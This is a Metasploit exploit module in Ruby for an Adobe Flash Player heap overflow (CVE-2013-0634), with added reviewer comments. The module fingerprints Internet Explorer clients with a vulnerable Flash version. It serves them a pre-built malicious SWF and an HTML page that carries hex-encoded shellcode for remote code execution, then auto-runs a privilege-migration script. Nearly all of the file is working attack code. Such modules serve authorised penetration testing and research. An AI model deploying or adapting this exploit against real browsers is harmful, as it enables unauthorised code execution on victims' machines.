##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser exploit module for CVE-2013-0634 (Adobe Flash Player regex heap
# overflow). The module does not build the malicious SWF itself: it serves a
# pre-built file from the framework's data directory (see #create_swf) and an
# HTML wrapper that passes the hex-encoded payload to it via FlashVars.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # BrowserExploitServer (BES) supplies the HTTP server, client fingerprinting,
  # browser_profile/retrieve_tag and the send_exploit_html/send_response helpers
  # used below.
  include Msf::Exploit::Remote::BrowserExploitServer

  # Registers module metadata with the framework.
  #
  # @param info [Hash] metadata overrides merged via update_info.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Adobe Flash Player Regular Expression Heap Overflow",
        'Description' => %q{
          This module exploits a vulnerability found in the ActiveX component of Adobe
          Flash Player before 11.5.502.149. By supplying a specially crafted swf file
          with special regex value, it is possible to trigger a memory corruption, which
          results in remote code execution under the context of the user, as exploited in
          the wild in February 2013. This module has been tested successfully with Adobe
          Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and Windows 7 SP1 before
          MS13-063, since it takes advantage of a predictable SharedUserData in order to
          leak ntdll and bypass ASLR.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # malware sample
          'Boris "dukeBarman" Ryutin', # msf exploit
          'juan vazquez' # ActionScript deobfuscation and cleaning
        ],
        'References' => [
          [ 'CVE', '2013-0634' ],
          [ 'OSVDB', '89936'],
          [ 'BID', '57787'],
          [ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],
          [ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]
        ],
        # 'Space' bounds the payload that exploit_template hex-encodes into
        # FlashVars; NOPs are disabled because the payload is passed as data,
        # not executed in place.
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true
        },
        'DefaultOptions' => {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
          'Retries' => false
        },
        'Platform' => 'win',
        # BES only serves the exploit to clients matching every requirement
        # below (Windows, Internet Explorer, the Flash ActiveX control loadable,
        # and a Flash version in the affected range).
        'BrowserRequirements' => {
          :source => /script|headers/i,
          :activex => [
            {
              clsid: "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
              method: "LoadMovie"
            }
          ],
          :os_name => OperatingSystems::Match::WINDOWS,
          :ua_name => Msf::HttpClients::IE,
          # NOTE(review): `ver < '11.5.502.149'` is a lexicographic String
          # comparison, not a numeric one; a build such as '11.5.502.9' sorts
          # after '11.5.502.149' and would be treated as not in range. A
          # component-wise version compare would be more precise -- confirm how
          # BES formats the reported Flash version before changing this.
          :flash => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }
        },
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2013-02-08',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Loads the pre-built SWF into @swf once, before the BES server loop in
  # `super` starts handling client requests. A missing data file raises here
  # (Errno::ENOENT from File.open in #create_swf) rather than mid-request.
  def exploit
    @swf = create_swf
    super
  end

  # Per-request handler invoked by BES once a client has passed the
  # BrowserRequirements check.
  #
  # Two kinds of request are distinguished by the URI: a request for the
  # `.swf` is answered with the cached SWF bytes; anything else gets the HTML
  # wrapper that embeds the SWF and carries the payload in FlashVars.
  #
  # @param cli [Rex::Proto::Http::ServerClient] connected client socket wrapper
  # @param request [Rex::Proto::Http::Request] the incoming HTTP request
  # @param target_info [Hash] client fingerprint gathered by BES, passed on to
  #   exploit_template for payload generation
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    # `$` is an end-of-line anchor; `\z` would be the strict end-of-string
    # anchor. Harmless for URI routing here, but worth knowing if this
    # pattern is ever reused for validation.
    if request.uri =~ /\.swf$/
      print_status("Sending SWF...")
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash', 'Pragma' => 'no-cache' })
      return
    end

    print_status("Sending HTML...")
    tag = retrieve_tag(cli, request)
    profile = browser_profile[tag]
    # BES marks a profile as already served (:tried). Reset it so the client's
    # follow-up request for the .swf is not rejected as a repeat attempt.
    profile[:tried] = false unless profile.nil?
    send_exploit_html(cli, exploit_template(cli, target_info), { 'Pragma' => 'no-cache' })
  end

  # Builds the HTML page that embeds the SWF and hands the payload to it.
  #
  # The payload is hex-encoded (unpack("H*")) and placed in the `his`
  # FlashVars parameter; the SWF name is randomised per request (4 to 6 alpha
  # characters, since rand(3) yields 0..2) so the .swf request is recognised by
  # the `.swf` suffix rather than a fixed name.
  #
  # @param cli [Rex::Proto::Http::ServerClient] client the payload is generated for
  # @param target_info [Hash] client fingerprint used by get_payload
  # @return [Array(String, Binding)] ERB template plus the binding that exposes
  #   the local variables `swf_random` and `shellcode` referenced by the
  #   `<%= %>` tags; presumably rendered by send_exploit_html. Do not rename
  #   those locals without updating the template.
  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    shellcode = get_payload(cli, target_info).unpack("H*")[0]

    # NOTE(review): the <object> start tag is written self-closed ("/>") yet
    # wraps <param> children; kept as-is since IE's behaviour is what this
    # module was tested against.
    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="his=<%=shellcode%>" />
    <param name="Play" value="true" />
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  # Reads the pre-built exploit SWF shipped in the framework data directory.
  #
  # @return [String] raw SWF bytes (read in binary mode)
  # @raise [Errno::ENOENT] if the data file is absent
  def create_swf
    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-0634", "exploit.swf")
    # The inner `swf =` is redundant: the block's value (f.read) is what the
    # outer assignment receives, and the block form closes the file. Equivalent
    # to ::File.binread(path).
    swf = ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end
end